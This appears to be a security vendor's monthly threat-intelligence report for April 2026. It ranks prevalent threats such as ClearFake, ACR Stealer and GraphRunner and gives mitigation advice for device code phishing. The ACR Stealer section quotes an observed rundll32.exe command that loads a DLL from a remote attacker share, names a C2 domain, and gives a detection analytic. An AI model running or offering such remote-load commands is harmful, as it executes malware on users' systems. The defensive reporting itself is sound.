Highlights from April
Coming in at number 1 on this month’s top 10 most prevalent threat list is ClearFake, its first time claiming the top spot. ClearFake is an activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste (paste and run, ClickFix, fakeCAPTCHA). Since its debut on our list in February 2026, ClearFake has stayed in the top 3, in large part due to the ongoing effectiveness of paste and run as an initial execution technique. ClearFake has delivered multiple payloads over time, including ArechClient2 and LummaC2; most recently, we’ve observed ACR Stealer, which debuts in this month’s top 10.
ACR Stealer, a malware-as-a-service (MaaS) information stealer written in C++ that has been active since 2024, makes its debut in a tie for 6th thanks to its use as a payload in recent ClearFake campaigns. You can read more about this threat below.
Also debuting in our top 10 and sharing the tie for 6th place is GraphRunner, a post-exploitation toolkit that uses the Microsoft Graph API to conduct reconnaissance, maintain persistence, and exfiltrate data via Entra ID accounts. While GraphRunner is intended for legitimate security testing and red team operations, adversaries can also abuse its capabilities for malicious activities across Outlook, SharePoint, OneDrive, and Teams.
Red Canary and other researchers have seen a recent surge in OAuth device code abuse, where adversaries use tools—including GraphRunner—to exploit legitimate login portals to trick users into completing a device authentication grant. Successful completion yields valid access and refresh tokens that carry a satisfied MFA claim, bypass many conditional access policies, and can be exchanged across first-party Microsoft applications to expand scope without re-authentication. Similar tradecraft has been commoditized by phishing-as-a-service (PhaaS) platforms like Kali365 and EvilTokens, which package the same device code abuse into subscription-based affiliate offerings.
Some of our mitigation recommendations for this kind of activity include:
- Block device code flows: Implement conditional access policies that lock down device code flows. This is one of the most effective controls to prevent device code phishing. It is rare for users to need device code authentication to perform their duties, so the impact on users should be minimal.
- Harden device joining: Adversaries have been observed joining their devices to maintain persistence and bypass stricter conditional access policies. We recommend limiting this permission strictly to groups that need to join Entra devices as part of their duties.
- Implement continuous access evaluation: Consider implementing continuous access evaluation (CAE) to enforce existing location-based conditional access policies in near real time
| Month's rank | Threat name | Threat description |
|---|---|---|
| Month's rank: ⬆ 1 | Threat name: | Threat description : Activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste |
| Month's rank: ⬆ 2* | Threat name: | Threat description : Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| Month's rank: ⬆ 2* | Threat name: | Threat description : Legitimate ConnectWise product that administrators use and adversaries abuse to remotely access and manage devices |
| Month's rank: ⮕ 4 | Threat name: | Threat description : macOS threat designed with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| Month's rank: ⮕ 5 | Threat name: | Threat description : Red Canary's name for an activity cluster that uses compromised web sites to trick users into executing malicious code |
| Month's rank: ⬆ 6* | Threat name: ACR Stealer | Threat description : Malware-as-a-service (MaaS) information stealer written in C++ that has been active since 2024 |
| Month's rank: ⬆ 6* | Threat name: GraphRunner | Threat description : Post-exploitation toolset for interacting with the Microsoft Graph API, enabling reconnaissance, persistence, and data exfiltration from Microsoft Entra ID accounts |
| Month's rank: ⬆ 8 | Threat name: | Threat description : Traffic distribution system, first observed in 2024, that uses compromised WordPress sites to deploy malicious code that may lead to malware families such as Rhysida and Interlock ransomware, D3F@ck Loader, Mocha Manakin, Mintsloader, and WARMCOOKIE |
| Month's rank: ⬆ 9* | Threat name: | Threat description : Campaign involving the account takeover attack of the widely-used npm package axios on March 30, 2026, which resulted in two malicious versions being propagated through automated updates |
| Month's rank: ⬇ 9* | Threat name: | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Month's rank: ⬆ 9* | Threat name: | Threat description : Malware used to steal credentials and other data |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
All about ACR Stealer
Also known as Amatera, ACR Stealer is marketed on Russian-speaking cybercrime forums by a threat actor named “SheldIO” and is assessed to be an updated version of GrMsk Stealer. ACR Stealer has several capabilities beyond its information stealing functions, including reconnaissance, anti-analysis checks, and keylogging. It can also download and execute additional payloads.
ACR Stealer has been delivered via ClearFake campaigns leveraging paste and run for initial execution since at least March 2025. One such campaign we observed in April 2026 used fake Claude Code GitLab pages like claude-desktop[.]gitlab[.]io to trick users into following malicious copy and paste instructions under the guide of installing Claude Code.
ClearFake paste and run lure, image from https://www.trendmicro.com/en_us/research/26/e/installfix-and-claude-code.html
In another campaign we observed in April 2026, the adversary behind ACR Stealer distributed it wrapped in a Go-based reflective loader to sideload a malicious DLL via rundll32.exe. This command seen early in the execution chain attempts to load a DLL from a remote network share:
"C:\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1”
Once successfully downloaded, the primary ACR Stealer DLL loads and executes in memory. One way to determine successful ACR Stealer execution is outbound command and control (C2) communications to related infrastructure, for example cw.compactedtightness[.]cfd (VirusTotal), often using rundll32.exe.
One example of delivery and execution of ACR Stealer in April 2026
ACR Stealer’s use of rundll32.exe to make outbound network connections gives us a detection opportunity.
Detection opportunity:rundll32.exe executing without any command-line parameters and establishing a network connection
This pseudo-detection analytic identifies rundll32.exe executing without any command-line parameters and establishing a network connection. It is highly unusual for rundll32.exe to execute without any command-line parameters present and with a network connection. This behavior is not inherently evil, but is common behavior in the execution of malware, including ACR Stealer. Additional investigation should focus on any network connections, the surrounding processes, and potential injection into rundll32.exe.
process == (rundll32.exe)
&&
command_line_includes (“”)*
&&
has_network_connection
Note: “” indicates a blank command line.